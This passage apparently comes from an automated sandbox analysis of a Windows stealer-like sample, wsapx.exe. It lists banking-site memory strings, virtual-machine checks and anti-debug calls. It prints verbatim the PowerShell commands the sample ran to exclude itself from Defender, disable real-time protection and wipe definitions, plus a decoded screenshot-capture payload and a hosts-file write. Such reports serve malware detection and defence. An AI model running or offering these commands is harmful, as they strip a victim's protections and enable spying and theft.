              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: foadsvmware
              Source: wsapx.exe, 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: *f4vmusrvc
              Source: wsapx.exe, 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer_
              Source: getmac.exe, 00000053.00000002.2390297595.000002A8F57D3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000053.00000003.2388039306.000002A8F57AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: getmac.exe, 00000053.00000002.2390297595.000002A8F57D3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000053.00000003.2388039306.000002A8F57AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: getmac.exe, 00000053.00000002.2390297595.000002A8F57AF000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000053.00000003.2388039306.000002A8F57AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71CA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7C71CA684
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD93D97B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FFD93D97B30
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71D34F0 GetProcessHeap,0_2_00007FF7C71D34F0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71BC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7C71BC910
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71CA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7C71CA684
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71BD37C SetUnhandledExceptionFilter,0_2_00007FF7C71BD37C
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71BD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7C71BD19C
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71BC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF7C71BC910
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71CA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7C71CA684
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71BD37C SetUnhandledExceptionFilter,2_2_00007FF7C71BD37C
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71BD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7C71BD19C
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94623068 IsProcessorFeaturePresent,00007FFDAC0619C0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFDAC0619C0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFD94623068
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E624C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,110_2_00007FF60E624C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E61A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,110_2_00007FF60E61A66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E61B6D8 SetUnhandledExceptionFilter,110_2_00007FF60E61B6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E61B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,110_2_00007FF60E61B52C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
